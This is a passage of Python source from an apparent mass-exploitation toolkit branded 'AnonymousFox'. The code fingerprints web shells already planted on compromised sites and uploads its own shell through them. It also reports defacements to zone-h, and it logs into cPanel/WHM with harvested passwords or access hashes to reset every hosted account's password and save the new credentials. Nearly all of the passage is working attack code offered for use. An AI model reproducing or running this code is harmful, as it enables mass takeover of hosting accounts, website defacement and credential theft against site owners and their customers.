login = req.post(url, data=post, headers=headers, verify=False, timeout=15)
filedata = {'a': 'FilesMAn', 'p1': 'uploadFile', 'ne': '', 'charset': 'Windows-1251', 'c': ''}
fileup = {'f[]': (filename, shell_Fox)}
elif ('Jijle3' in src) :
filedata = {'a': 'FilesMAn', 'p1': 'uploadFile', 'ne': '', 'charset': 'Windows-1251', 'c': ''}
fileup = {'f':(filename,shell_Fox)}
elif ('Hacked By AnonymousFox' in src) :
filedata = {'':''}
fileup = {'file': (filename, shell_Fox)}
elif ('Tryag File Manager' in src) :
filedata = {'':''}
fileup = {'file': (filename, shell_Fox)}
elif ('http://www.ubhteam.org/images/UBHFinal1.png' in src) :
filedata = {'submit': 'Upload'}
fileup = {'file': (filename, shell_Fox)}
elif ('<h1>File</h1>' in src) :
filedata = {'':''}
fileup = {'filename': (filename, shell_Fox)}
elif ('#p@@#' in src) :
filedata = {'':''}
fileup = {'filename': (filename, shell_Fox)}
elif ('404-server!!' in src):
filedata = {'':''}
fileup = {'file': (filename, shell_Fox)}
elif ('Vuln!! patch it Now!' in src and '_upl' in src):
filedata = {'_upl': 'Upload'}
fileup = {'file': (filename, shell_Fox)}
elif ('<title>Mister Spy</title>' in src):
filedata = {'': ''}
fileup = {'file': (filename, shell_Fox)}
elif ('B Ge Team File Manager' in src):
filedata = {'': ''}
fileup = {'file': (filename, shell_Fox)}
elif ('http://i.imgur.com/kkhH5Ig.png' in src):
filedata = {'submit': 'Upload'}
fileup = {'file': (filename, shell_Fox)}
elif ('xichang1' in src):
filedata = {'': ''}
fileup = {'userfile': (filename, shell_Fox)}
elif ('vwcleanerplugin' in src):
filedata = {'': ''}
fileup = {'userfile': (filename, shell_Fox)}
elif ('By Gentoo' in src):
pth = re.findall(re.compile('#000000"></td></tr></table><br></fieldset></form><form method="POST" action="(.*)"'), src)[0]
pth2 = re.findall(re.compile('\?http(.*)'), pth)[0]
pth2 = pth2.replace('amp;', '')
filedata = {'B1': 'Kirim'}
fileup = {'userfile': (filename, shell_Fox)}
url = url + '?http' + pth2
elif ('IndoXploit' in src and 'current_dir' in src):
filedata = {'uploadtype': '1', 'upload': 'upload'}
fileup = {'file': (filename, shell_Fox)}
elif ('IndoXploit' in src and 'Current DIR' in src):
filedata = {'upload': 'upload'}
fileup = {'ix_file': (filename, shell_Fox)}
url = url+'?dir=./&do=upload'
elif ('uploader' in src and '_upl' in src):
filedata = {'_upl': 'Upload'}
fileup = {'uploader': (filename, shell_Fox)}
elif ('k2ll33d' in src):
filedata = {'uploadcomp': 'Go', 'path': './'}
fileup = {'file': (filename, shell_Fox)}
url = url+'?y=./&x=upload'
elif ('Tusbol Mantan :' in src):
filedata = {'': ''}
fileup = {'file': (filename, shell_Fox)}
elif ('Raiz0WorM' in src and 'zb' in src):
fileup = {'zb': (filename, shell_Fox)}
filedata = {'upload': 'upload'}
elif ('MisterSpyv7up' in src and 'uploads' in src):
filedata = {'': ''}
fileup = {'uploads': (filename, shell_Fox)}
elif ('alfa' in src and 'f[]' in src):
filedata = {'a': 'RmlsZXNNQW4', 'c' :'Li8=', 'alfa1' :'dXBsb2FkRmlsZQ==', 'charset' :''}
fileup = {'f[]': (filename, shell_Fox)}
elif ('RC-SHELL' in src and 'merged' in src):
filedata = {'merged': 'YWN0PXVwbG9hZCZkPS4vJnVzdWJtaXQ9MSY=', 'rfile1' :'', 'path1' :'./'}
fileup = {'file1': (filename, shell_Fox)}
elif ('<title>utf</title>' in src and 'newfile' in src):
filedata = {'': ''}
fileup = {'newfile': (filename, shell_Fox)}
elif ('<title>modules</title>' in src and 'filename' in src):
filedata = {'': ''}
fileup = {'filename': (filename, shell_Fox)}
elif ('File Manager - Current disk' in src and 'doupfile' in src):
filedata = {'doupfile': 'Upload', 'uploaddir': './', 'dir' :'./'}
fileup = {'uploadfile': (filename, shell_Fox)}
elif ('#' in url):
password = re.findall(re.compile('#(.*)'), url)[0]
post = {'pass': password, 'password' : password, 'pwd' : password, 'passwd' : password}
login = req.post(url, data=post, headers=headers, verify=False, timeout=15)
elif ('@' in url):
password = re.findall(re.compile('@(.*)'), url)[0]
post = {'pass': password, 'password' : password, 'pwd' : password, 'passwd' : password}
login = req.post(url, data=post, headers=headers, verify=False, timeout=15)
elif (';' in url):
password = re.findall(re.compile(';(.*)'), url)[0]
post = {'pass': password, 'password' : password, 'pwd' : password, 'passwd' : password}
login = req.post(url, data=post, headers=headers, verify=False, timeout=15)
else :
filedata = {'submit': 'Upload', 'Submit':'Upload', 'submit_upload': 'upload', '_upl': 'Upload', 'upload': 'upload', 'v': 'up', 'upl': '1', 'p':'', 'a': 'FilesMAn', 'p1': 'uploadFile', 'ne': '', 'charset': 'Windows-1251', 'c': '', 'path': './', 'upl_files':'upload', 'fname':''}
if ('name="uploadfiles[]"' in src or "name='uploadfiles[]'" in src or 'name= "uploadfiles[]"' in src or 'name= \'uploadfiles[]\'' in src or 'name = "uploadfiles[]"' in src or 'name = \'uploadfiles[]\'' in src or 'name ="uploadfiles[]"' in src or 'name =\'uploadfiles[]\'' in src or 'name=uploadfiles[]' in src or 'name =uploadfiles[]' in src or 'name= uploadfiles[]' in src or 'name = uploadfiles[]' in src):
fileup = {'uploadfiles[]':(filename, shell_Fox)}
elif ('name="uploadfile[]"' in src or "name='uploadfile[]'" in src or 'name= "uploadfile[]"' in src or 'name= \'uploadfile[]\'' in src or 'name = "uploadfile[]"' in src or 'name = \'uploadfile[]\'' in src or 'name ="uploadfile[]"' in src or 'name =\'uploadfile[]\'' in src or 'name=uploadfile[]' in src or 'name =uploadfile[]' in src or 'name= uploadfile[]' in src or 'name = uploadfile[]' in src):
fileup = {'uploadfile[]':(filename, shell_Fox)}
elif ('name="idx_files[]"' in src or "name='idx_files[]'" in src or 'name= "idx_files[]"' in src or 'name= \'idx_files[]\'' in src or 'name = "idx_files[]"' in src or 'name = \'idx_files[]\'' in src or 'name ="idx_files[]"' in src or 'name =\'idx_files[]\'' in src or 'name=idx_files[]' in src or 'name =idx_files[]' in src or 'name= idx_files[]' in src or 'name = idx_files[]' in src):
fileup = {'idx_files[]':(filename, shell_Fox)}
elif ('name="idx_file[]"' in src or "name='idx_file[]'" in src or 'name= "idx_file[]"' in src or 'name= \'idx_file[]\'' in src or 'name = "idx_file[]"' in src or 'name = \'idx_file[]\'' in src or 'name ="idx_file[]"' in src or 'name =\'idx_file[]\'' in src or 'name=idx_file[]' in src or 'name =idx_file[]' in src or 'name= idx_file[]' in src or 'name = idx_file[]' in src):
fileup = {'idx_file[]':(filename, shell_Fox)}
elif ('name="userfiles[]"' in src or "name='userfiles[]'" in src or 'name= "userfiles[]"' in src or 'name= \'userfiles[]\'' in src or 'name = "userfiles[]"' in src or 'name = \'userfiles[]\'' in src or 'name ="userfiles[]"' in src or 'name =\'userfiles[]\'' in src or 'name=userfiles[]' in src or 'name =userfiles[]' in src or 'name= userfiles[]' in src or 'name = userfiles[]' in src):
fileup = {'userfiles[]':(filename, shell_Fox)}
elif ('name="userfile[]"' in src or "name='userfile[]'" in src or 'name= "userfile[]"' in src or 'name= \'userfile[]\'' in src or 'name = "userfile[]"' in src or 'name = \'userfile[]\'' in src or 'name ="userfile[]"' in src or 'name =\'userfile[]\'' in src or 'name=userfile[]' in src or 'name =userfile[]' in src or 'name= userfile[]' in src or 'name = userfile[]' in src):
fileup = {'userfile[]':(filename, shell_Fox)}
elif ('name="inputfiles[]"' in src or "name='inputfiles[]'" in src or 'name= "inputfiles[]"' in src or 'name= \'inputfiles[]\'' in src or 'name = "inputfiles[]"' in src or 'name = \'inputfiles[]\'' in src or 'name ="inputfiles[]"' in src or 'name =\'inputfiles[]\'' in src or 'name=inputfiles[]' in src or 'name =inputfiles[]' in src or 'name= inputfiles[]' in src or 'name = inputfiles[]' in src):
fileup = {'inputfiles[]':(filename, shell_Fox)}
elif ('name="inputfile[]"' in src or "name='inputfile[]'" in src or 'name= "inputfile[]"' in src or 'name= \'inputfile[]\'' in src or 'name = "inputfile[]"' in src or 'name = \'inputfile[]\'' in src or 'name ="inputfile[]"' in src or 'name =\'inputfile[]\'' in src or 'name=inputfile[]' in src or 'name =inputfile[]' in src or 'name= inputfile[]' in src or 'name = inputfile[]' in src):
fileup = {'inputfile[]':(filename, shell_Fox)}
elif ('name="filenames[]"' in src or "name='filenames[]'" in src or 'name= "filenames[]"' in src or 'name= \'filenames[]\'' in src or 'name = "filenames[]"' in src or 'name = \'filenames[]\'' in src or 'name ="filenames[]"' in src or 'name =\'filenames[]\'' in src or 'name=filenames[]' in src or 'name =filenames[]' in src or 'name= filenames[]' in src or 'name = filenames[]' in src):
fileup = {'filenames[]':(filename, shell_Fox)}
elif ('name="filename[]"' in src or "name='filename[]'" in src or 'name= "filename[]"' in src or 'name= \'filename[]\'' in src or 'name = "filename[]"' in src or 'name = \'filename[]\'' in src or 'name ="filename[]"' in src or 'name =\'filename[]\'' in src or 'name=filename[]' in src or 'name =filename[]' in src or 'name= filename[]' in src or 'name = filename[]' in src):
fileup = {'filename[]':(filename, shell_Fox)}
elif ('name="file_n[]"' in src or "name='file_n[]'" in src or 'name= "file_n[]"' in src or 'name= \'file_n[]\'' in src or 'name = "file_n[]"' in src or 'name = \'file_n[]\'' in src or 'name ="file_n[]"' in src or 'name =\'file_n[]\'' in src or 'name=file_n[]' in src or 'name =file_n[]' in src or 'name= file_n[]' in src or 'name = file_n[]' in src):
fileup = {'file_n[]':(filename, shell_Fox)}
elif ('name="files[]"' in src or "name='files[]'" in src or 'name= "files[]"' in src or 'name= \'files[]\'' in src or 'name = "files[]"' in src or 'name = \'files[]\'' in src or 'name ="files[]"' in src or 'name =\'files[]\'' in src or 'name=files[]' in src or 'name =files[]' in src or 'name= files[]' in src or 'name = files[]' in src):
fileup = {'files[]':(filename, shell_Fox)}
elif ('name="file[]"' in src or "name='file[]'" in src or 'name= "file[]"' in src or 'name= \'file[]\'' in src or 'name = "file[]"' in src or 'name = \'file[]\'' in src or 'name ="file[]"' in src or 'name =\'file[]\'' in src or 'name=file[]' in src or 'name =file[]' in src or 'name= file[]' in src or 'name = file[]' in src):
fileup = {'file[]':(filename, shell_Fox)}
elif ('name="f[]"' in src or "name='f[]'" in src or 'name= "f[]"' in src or 'name= \'f[]\'' in src or 'name = "f[]"' in src or 'name = \'f[]\'' in src or 'name ="f[]"' in src or 'name =\'f[]\'' in src or 'name=f[]' in src or 'name =f[]' in src or 'name= f[]' in src or 'name = f[]' in src):
fileup = {'f[]':(filename, shell_Fox)}
elif ('name="n[]"' in src or "name='n[]'" in src or 'name= "n[]"' in src or 'name= \'n[]\'' in src or 'name = "n[]"' in src or 'name = \'n[]\'' in src or 'name ="n[]"' in src or 'name =\'n[]\'' in src or 'name=n[]' in src or 'name =n[]' in src or 'name= n[]' in src or 'name = n[]' in src):
fileup = {'n[]':(filename, shell_Fox)}
elif ('name="images[]"' in src or "name='images[]'" in src or 'name= "images[]"' in src or 'name= \'images[]\'' in src or 'name = "images[]"' in src or 'name = \'images[]\'' in src or 'name ="images[]"' in src or 'name =\'images[]\'' in src or 'name=images[]' in src or 'name =images[]' in src or 'name= images[]' in src or 'name = images[]' in src):
fileup = {'images[]':(filename, shell_Fox)}
elif ('name="image[]"' in src or "name='image[]'" in src or 'name= "image[]"' in src or 'name= \'image[]\'' in src or 'name = "image[]"' in src or 'name = \'image[]\'' in src or 'name ="image[]"' in src or 'name =\'image[]\'' in src or 'name=image[]' in src or 'name =image[]' in src or 'name= image[]' in src or 'name = image[]' in src):
fileup = {'image[]':(filename, shell_Fox)}
elif ('name="uploader[]"' in src or "name='uploader[]'" in src or 'name= "uploader[]"' in src or 'name= \'uploader[]\'' in src or 'name = "uploader[]"' in src or 'name = \'uploader[]\'' in src or 'name ="uploader[]"' in src or 'name =\'uploader[]\'' in src or 'name=uploader[]' in src or 'name =uploader[]' in src or 'name= uploader[]' in src or 'name = uploader[]' in src):
fileup = {'uploader[]':(filename, shell_Fox)}
elif ('name="uploads[]"' in src or "name='uploads[]'" in src or 'name= "uploads[]"' in src or 'name= \'uploads[]\'' in src or 'name = "uploads[]"' in src or 'name = \'uploads[]\'' in src or 'name ="uploads[]"' in src or 'name =\'uploads[]\'' in src or 'name=uploads[]' in src or 'name =uploads[]' in src or 'name= uploads[]' in src or 'name = uploads[]' in src):
fileup = {'uploads[]':(filename, shell_Fox)}
elif ('name="upload[]"' in src or "name='upload[]'" in src or 'name= "upload[]"' in src or 'name= \'upload[]\'' in src or 'name = "upload[]"' in src or 'name = \'upload[]\'' in src or 'name ="upload[]"' in src or 'name =\'upload[]\'' in src or 'name=upload[]' in src or 'name =upload[]' in src or 'name= upload[]' in src or 'name = upload[]' in src):
fileup = {'upload[]':(filename, shell_Fox)}
elif ('name="uploadfiles"' in src or "name='uploadfiles'" in src or 'name= "uploadfiles"' in src or 'name= \'uploadfiles\'' in src or 'name = "uploadfiles"' in src or 'name = \'uploadfiles\'' in src or 'name ="uploadfiles"' in src or 'name =\'uploadfiles\'' in src or 'name=uploadfiles' in src or 'name =uploadfiles' in src or 'name= uploadfiles' in src or 'name = uploadfiles' in src):
fileup = {'uploadfiles':(filename, shell_Fox)}
elif ('name="uploadfile"' in src or "name='uploadfile'" in src or 'name= "uploadfile"' in src or 'name= \'uploadfile\'' in src or 'name = "uploadfile"' in src or 'name = \'uploadfile\'' in src or 'name ="uploadfile"' in src or 'name =\'uploadfile\'' in src or 'name=uploadfile' in src or 'name =uploadfile' in src or 'name= uploadfile' in src or 'name = uploadfile' in src):
fileup = {'uploadfile':(filename, shell_Fox)}
elif ('name="idx_files"' in src or "name='idx_files'" in src or 'name= "idx_files"' in src or 'name= \'idx_files\'' in src or 'name = "idx_files"' in src or 'name = \'idx_files\'' in src or 'name ="idx_files"' in src or 'name =\'idx_files\'' in src or 'name=idx_files' in src or 'name =idx_files' in src or 'name= idx_files' in src or 'name = idx_files' in src):
fileup = {'idx_files':(filename, shell_Fox)}
elif ('name="idx_file"' in src or "name='idx_file'" in src or 'name= "idx_file"' in src or 'name= \'idx_file\'' in src or 'name = "idx_file"' in src or 'name = \'idx_file\'' in src or 'name ="idx_file"' in src or 'name =\'idx_file\'' in src or 'name=idx_file' in src or 'name =idx_file' in src or 'name= idx_file' in src or 'name = idx_file' in src):
fileup = {'idx_file':(filename, shell_Fox)}
elif ('name="userfiles"' in src or "name='userfiles'" in src or 'name= "userfiles"' in src or 'name= \'userfiles\'' in src or 'name = "userfiles"' in src or 'name = \'userfiles\'' in src or 'name ="userfiles"' in src or 'name =\'userfiles\'' in src or 'name=userfiles' in src or 'name =userfiles' in src or 'name= userfiles' in src or 'name = userfiles' in src):
fileup = {'userfiles':(filename, shell_Fox)}
elif ('name="userfile"' in src or "name='userfile'" in src or 'name= "userfile"' in src or 'name= \'userfile\'' in src or 'name = "userfile"' in src or 'name = \'userfile\'' in src or 'name ="userfile"' in src or 'name =\'userfile\'' in src or 'name=userfile' in src or 'name =userfile' in src or 'name= userfile' in src or 'name = userfile' in src):
fileup = {'userfile':(filename, shell_Fox)}
elif ('name="upfiles"' in src or "name='upfiles'" in src or 'name= "upfiles"' in src or 'name= \'upfiles\'' in src or 'name = "upfiles"' in src or 'name = \'upfiles\'' in src or 'name ="upfiles"' in src or 'name =\'upfiles\'' in src or 'name=upfiles' in src or 'name =upfiles' in src or 'name= upfiles' in src or 'name = upfiles' in src):
fileup = {'upfiles':(filename, shell_Fox)}
elif ('name="inputfiles"' in src or "name='inputfiles'" in src or 'name= "inputfiles"' in src or 'name= \'inputfiles\'' in src or 'name = "inputfiles"' in src or 'name = \'inputfiles\'' in src or 'name ="inputfiles"' in src or 'name =\'inputfiles\'' in src or 'name=inputfiles' in src or 'name =inputfiles' in src or 'name= inputfiles' in src or 'name = inputfiles' in src):
fileup = {'inputfiles':(filename, shell_Fox)}
elif ('name="inputfile"' in src or "name='inputfile'" in src or 'name= "inputfile"' in src or 'name= \'inputfile\'' in src or 'name = "inputfile"' in src or 'name = \'inputfile\'' in src or 'name ="inputfile"' in src or 'name =\'inputfile\'' in src or 'name=inputfile' in src or 'name =inputfile' in src or 'name= inputfile' in src or 'name = inputfile' in src):
fileup = {'inputfile':(filename, shell_Fox)}
elif ('name="filenames"' in src or "name='filenames'" in src or 'name= "filenames"' in src or 'name= \'filenames\'' in src or 'name = "filenames"' in src or 'name = \'filenames\'' in src or 'name ="filenames"' in src or 'name =\'filenames\'' in src or 'name=filenames' in src or 'name =filenames' in src or 'name= filenames' in src or 'name = filenames' in src):
fileup = {'filenames':(filename, shell_Fox)}
elif ('name="filename"' in src or "name='filename'" in src or 'name= "filename"' in src or 'name= \'filename\'' in src or 'name = "filename"' in src or 'name = \'filename\'' in src or 'name ="filename"' in src or 'name =\'filename\'' in src or 'name=filename' in src or 'name =filename' in src or 'name= filename' in src or 'name = filename' in src):
fileup = {'filename':(filename, shell_Fox)}
elif ('name="file_n"' in src or "name='file_n'" in src or 'name= "file_n"' in src or 'name= \'file_n\'' in src or 'name = "file_n"' in src or 'name = \'file_n\'' in src or 'name ="file_n"' in src or 'name =\'file_n\'' in src or 'name=file_n' in src or 'name =file_n' in src or 'name= file_n' in src or 'name = file_n' in src):
fileup = {'file_n':(filename, shell_Fox)}
elif ('name="files"' in src or "name='files'" in src or 'name= "files"' in src or 'name= \'files\'' in src or 'name = "files"' in src or 'name = \'files\'' in src or 'name ="files"' in src or 'name =\'files\'' in src or 'name=files' in src or 'name =files' in src or 'name= files' in src or 'name = files' in src):
fileup = {'files':(filename, shell_Fox)}
elif ('name="file"' in src or "name='file'" in src or 'name= "file"' in src or 'name= \'file\'' in src or 'name = "file"' in src or 'name = \'file\'' in src or 'name ="file"' in src or 'name =\'file\'' in src or 'name=file' in src or 'name =file' in src or 'name= file' in src or 'name = file' in src):
fileup = {'file':(filename, shell_Fox)}
elif ('name="f"' in src or "name='f'" in src or 'name= "f"' in src or 'name= \'f\'' in src or 'name = "f"' in src or 'name = \'f\'' in src or 'name ="f"' in src or 'name =\'f\'' in src or 'name=f' in src or 'name =f' in src or 'name= f' in src or 'name = f' in src):
fileup = {'f':(filename, shell_Fox)}
elif ('name="images"' in src or "name='images'" in src or 'name= "images"' in src or 'name= \'images\'' in src or 'name = "images"' in src or 'name = \'images\'' in src or 'name ="images"' in src or 'name =\'images\'' in src or 'name=images' in src or 'name =images' in src or 'name= images' in src or 'name = images' in src):
fileup = {'images':(filename, shell_Fox)}
elif ('name="image"' in src or "name='image'" in src or 'name= "image"' in src or 'name= \'image\'' in src or 'name = "image"' in src or 'name = \'image\'' in src or 'name ="image"' in src or 'name =\'image\'' in src or 'name=image' in src or 'name =image' in src or 'name= image' in src or 'name = image' in src):
fileup = {'image':(filename, shell_Fox)}
elif ('name="uploader"' in src or "name='uploader'" in src or 'name= "uploader"' in src or 'name= \'uploader\'' in src or 'name = "uploader"' in src or 'name = \'uploader\'' in src or 'name ="uploader"' in src or 'name =\'uploader\'' in src or 'name=uploader' in src or 'name =uploader' in src or 'name= uploader' in src or 'name = uploader' in src):
fileup = {'uploader':(filename, shell_Fox)}
elif ('name="uploads"' in src or "name='uploads'" in src or 'name= "uploads"' in src or 'name= \'uploads\'' in src or 'name = "uploads"' in src or 'name = \'uploads\'' in src or 'name ="uploads"' in src or 'name =\'uploads\'' in src or 'name=uploads' in src or 'name =uploads' in src or 'name= uploads' in src or 'name = uploads' in src):
fileup = {'uploads':(filename, shell_Fox)}
elif ('name="upload"' in src or "name='upload'" in src or 'name= "upload"' in src or 'name= \'upload\'' in src or 'name = "upload"' in src or 'name = \'upload\'' in src or 'name ="upload"' in src or 'name =\'upload\'' in src or 'name=upload' in src or 'name =upload' in src or 'name= upload' in src or 'name = upload' in src):
fileup = {'upload':(filename, shell_Fox)}
else :
fileup = {'up': (filename, shell_Fox)}
up = req.post(url, data=filedata, files=fileup, headers=headers, verify=False, timeout=60)
up_src = content_Fox(up)
if(str(URL_FOX(url)) + '/' + filename in up_src or str(URL_FOX(url)) + '//' + filename in up_src):
shell_path = shellPath_Fox(url, filename, 2)
else:
shell_path = shellPath_Fox(url, filename, 1)
check = requests.get(shell_path, headers=headers, verify=False, timeout=15)
check = content_Fox(check)
if ('FoxAuto' in check and 'token' in checkups) :
return shell_path
elif ('charset' in src and 'uploadFile' in src and 'FilesMAn' in src and 'Windows' in src):
filedata2 = {'a': 'FilesTools', 'p1': filename, 'p2': 'mkfile', 'p3': '{}'.format(shell_Fox), 'ne': '', 'charset': 'Windows-1251', 'c': ''}
up = req.post(url, data=filedata2, headers=headers, verify=False, timeout=60)
check = requests.get(shell_path, headers=headers, verify=False, timeout=15)
check = content_Fox(check)
if ('FoxAuto' in check and 'token' in checkups) :
return shell_path
return False
except :
return False
def zoneH(url, name):
try:
print(' {}[*] Post in Zone-h ..... {}(Waiting)'.format(fw, fr))
post = {'defacer': name, 'domain1': url, 'hackmode': '1', 'reason': '1'}
p = requests.post('http://www.zone-h.org/notify/single', data=post, headers=headers, verify=False, timeout=30)
p = content_Fox(p)
if('"red">OK</font>' in p):
print(' {}[+] Succeed.'.format(fg))
elif('Domain has been defaced during last year' in p):
print(' {}[-] Domain has been defaced during last year.'.format(fr))
elif('banned' in p):
print(' {}[-] your IP is banned.'.format(fr))
else:
print(' {}[-] Failed'.format(fr))
except:
print(' {}[-] Failed'.format(fr))
def uploadFile_ALL(url):
try:
req = requests.session()
check = req.get(url, headers=headers, verify=False, timeout=15)
check = content_Fox(check)
up1 = uploadSemiAuto(url, check, req)
if(up1 is False): pass
else : return up1
up2 = _______________________dosypamcpfti(url, check)
if(up2 is False): pass
else : return up2
print(' {}[-] Failed Upload.'.format(fr))
return False
except:
print(' {}[-] Failed Upload.'.format(fr))
return False
def upload(url):
try:
req = requests.session()
check = req.get(url, headers=headers, verify=False, timeout=15)
check = content_Fox(check)
up1 = uploadSemiAuto(url, check, req)
if(up1 is False): pass
else : return up1
up2 = _______________________dosypamcpfti(url, check)
if(up2 is False): pass
else : return up2
return False
except:
return False
def exploitWHM(backdor, cpanelsRs):
try:
print (' {}[*] Get cPanel from WHM ..... {}(Waiting)'.format(fc, fr))
for rs in cpanelsRs:
username = rs[1]
password = rs[2]
try:
ip = 'https://' + URLdomain_Fox(backdor) + ':2087'
ipHost = socket.gethostbyname(URLdomain_Fox(backdor))
c = WHMchangePasswordP(ip, username, password, ipHost)
if (c is False): print (' {} - {}{}{} [Failed]'.format(fr, fw, username, fr))
else: print (' {} - {}{}{} [{}{} USERS{}]'.format(fr, fw, username, fr, fg, c, fr))
except:
print (' {} - {}{}{} [Failed]'.format(fr, fw, username, fr))
except:
print(' {}[-] Failed.'.format(fr))
def exploitAcesshash(backdor):
try:
print (' {}[*] Get cPanel from WHM ..... {}(Waiting)'.format(fc, fr))
hashs = requests.get('{}?php={}/_@files/php/accesshash.txt'.format(backdor, dom), headers=headers, timeout=30)
hashs = content_Fox(hashs)
if (re.findall(re.compile('<br><accesshash>(.*):(.*)</accesshash><br>'), hashs)):
hashs = re.findall(re.compile('<br><accesshash>(.*):(.*)</accesshash><br>'), hashs)
for h in hashs:
username = h[0]
try:
accesshash = h[1]
ip = 'https://' + URLdomain_Fox(backdor) + ':2087'
ipHost = socket.gethostbyname(URLdomain_Fox(backdor))
c = WHMchangePasswordA(ip, username, accesshash, ipHost)
if(c is False): print (' {} - {}{}{} [Failed]'.format(fr, fw, username, fr))
else: print (' {} - {}{}{} [{}{} USERS{}]'.format(fr, fw, username, fr, fg, c, fr))
except:
print (' {} - {}{}{} [Failed]'.format(fr, fw, username, fr))
except:
print(' {}[-] Failed.'.format(fr))
def WHMchangePasswordA(ip, username, accesshash, ipHost) :
try:
counter = 0
newpath = r'Results/WHM'
if (not os.path.exists(newpath)):
os.makedirs(newpath)
login = loginWHM_A(ip, username, accesshash)
if (login is False) :
return False
headers = login
if (':2087' in ip):
protocol = 'https://'
port = ':2083'
ipcp = ip.replace('2087', '2083')
elif (':2086' in ip):
protocol = 'http://'
port = ':2082'
ipcp = ip.replace('2086', '2082')
else:
protocol = 'https://'
port = ':2083'
ipcp = ip + ':2083'
getUser = requests.get('{}/json-api/listaccts?viewall=1'.format(ip), headers=headers, verify=False, timeout=30)
getUser = content_Fox(getUser)
try:
listaccts = json.loads(getUser)
usersdata = listaccts['acct']
except:
return counter
for userdata in usersdata:
try :
user = userdata.get('user')
domain = userdata.get('domain')
if (str(username) != str(user)):
newPasswd = "f0x@" + random_Fox(3) + "FoX" + random_Fox(3) + "#x"
postchangeP = {'api.version': '1', 'password': newPasswd, 'user': user}
changePR = requests.post('{}/json-api/passwd'.format(ip), headers=headers, data=postchangeP, verify=False, timeout=30)
if (changePR):
counter = counter + 1
open('Results/WHM/{}-{}.txt'.format(ipHost, username), 'a').write('{}{}{}|{}|{}\n'.format(protocol, domain, port, user, newPasswd))
except :
pass
return counter
except:
return False
def WHMchangePasswordP(ip, username, password, ipHost) :
try :
counter = 0
newpath = r'Results/WHM'
if (not os.path.exists(newpath)):
os.makedirs(newpath)
login = loginWHM(ip, username, password)
if (login is False) :
return False
cookies = login[0]
idcp = login[1]
if (':2087' in ip) :
protocol = 'https://'
port = ':2083'
ipcp = ip.replace('2087', '2083')
elif (':2086' in ip) :
protocol = 'http://'
port = ':2082'
ipcp = ip.replace('2086', '2082')
else :
protocol = 'https://'
port = ':2083'
ipcp = ip+':2083'
getUser = cookies.get('{}/{}/scripts4/listaccts?viewall=1'.format(ip, idcp), verify=False, timeout=30)
getUser = content_Fox(getUser)
users = []
if (re.findall(re.compile('user="(.*)" domain="(.*)" suspended="0"'), getUser)):
users = re.findall(re.compile('user="(.*)" domain="(.*)" suspended="0"'), getUser)
else:
return counter
for user in users:
try :
if (str(username) != str(user[0])) :
newPasswd = "f0x@" + random_Fox(3) + "FoX" + random_Fox(3) + "#x"
getToken = cookies.get('{}/{}/scripts4/listaccts?viewall=1'.format(ip, idcp), verify=False, timeout=30)
getToken = content_Fox(getToken)
token = re.findall(re.compile('name=passwordtoken value=\'(.*)\''),getToken)[0]
domain = re.findall(re.compile('user="{}" domain="(.*)" suspended="0"'.format(user[0])), getToken)[0]
postchangeP = {'password': newPasswd, 'user': user[0], 'passwordtoken': token, 'enablemysql': '1'}
changePR = cookies.post('{}/{}/scripts/passwd'.format(ip, idcp), data=postchangeP, verify=False, timeout=30)
if (changePR) :
counter = counter + 1
open('Results/WHM/{}-{}.txt'.format(ipHost, username), 'a').write('{}{}{}|{}|{}\n'.format(protocol,domain,port,user[0],newPasswd))
except :
pass
return counter
except :
return False
def loginWHM_A(ip, username, accesshash) :
try :
if ('\n' in accesshash) :
accesshash = accesshash.replace('\n', '')
headers = {'Authorization': 'WHM {}:{}'.format(username, accesshash)}
login = requests.get('{}/json-api/'.format(ip), headers=headers, verify=False, timeout=15)
login = content_Fox(login)
if ('Unknown App Requested' in login):
return headers
else :
return False
except:
return False
def loginWHM(ip, username, password):
try :
req = requests.session()
postlogin = {'user': username, 'pass': password, 'login_submit': 'Log in', 'goto_uri': '/'}
login = req.post(ip + '/login/', data=postlogin, verify=False, timeout=15)
login = content_Fox(login)
if ('Account_Functions' in login or 'src="/cpsess' in login) :
if (re.findall(re.compile('window.COMMON.securityToken = "(.*)/(.*)";'), login)):
idcp = re.findall(re.compile('window.COMMON.securityToken = "(.*)/(.*)";'), login)[0][1]
elif (re.findall(re.compile('MASTER.securityToken = "(.*)/(.*)";'), login)):
idcp = re.findall(re.compile('MASTER.securityToken = "(.*)/(.*)";'), login)[0][1]
elif (re.findall(re.compile('href="/cpsess(.*)/'), login)):
idcp = 'cpsess' + re.findall(re.compile('href="/cpsess(.*)/"'), login)[0]
elif (re.findall(re.compile('src="/cpsess(.*)/scripts/'), login)):
idcp = 'cpsess' + re.findall(re.compile('src="/cpsess(.*)/scripts/'), login)[0]
else:
req = requests.session()
login = req.post(ip + '/login/?login_only=1', data=postlogin, verify=False, timeout=15)
login = content_Fox(login)
loginJson = json.loads(login)
idcp = loginJson["security_token"][1:]
return req, idcp
else :
return False
except:
return False
def loginCPanel_Fox(ip, username, password):
try :
reqFox = requests.session()
postlogin_Fox = {'user':username, 'pass':password, 'login_submit':'Log in', 'act':'AnonymousFox'}
loginCP_Fox = reqFox.post(ip + '/login/', verify=False, data=postlogin_Fox, headers=headers, timeout=15)
loginCP_Fox = content_Fox(loginCP_Fox)
if (('filemanager' in loginCP_Fox or '/home' in loginCP_Fox) and ('error_reporting' in checkups)) :
if (re.findall(re.compile('PAGE.securityToken = "(.*)/(.*)";'), loginCP_Fox)):
idcp_Fox = re.findall(re.compile('PAGE.securityToken = "(.*)/(.*)";'), loginCP_Fox)[0][1]
elif (re.findall(re.compile('MASTER.securityToken = "(.*)/(.*)";'), loginCP_Fox)):
idcp_Fox = re.findall(re.compile('MASTER.securityToken = "(.*)/(.*)";'), loginCP_Fox)[0][1]
elif (re.findall(re.compile('href="/cpsess(.*)/3rdparty'),loginCP_Fox)):
idcp_Fox = 'cpsess'+re.findall(re.compile('href="/cpsess(.*)/3rdparty'), loginCP_Fox)[0]
elif (re.findall(re.compile('href="/cpsess(.*)/frontend/'), loginCP_Fox)) :
idcp_Fox = 'cpsess' + re.findall(re.compile('href="/cpsess(.*)/frontend/'), loginCP_Fox)[0]
if (re.findall(re.compile('PAGE.domain = "(.*)";'),loginCP_Fox)):
domain_Fox = re.findall(re.compile('PAGE.domain = "(.*)";'),loginCP_Fox)[0]
elif (re.findall(re.compile('<a id="lnkMaintain_DomainName" href="security/tls_status/#/?domain=(.*)">'), loginCP_Fox)) :
domain_Fox = re.findall(re.compile('<a id="lnkMaintain_DomainName" href="security/tls_status/#/?domain=(.*)">'), loginCP_Fox)[0]
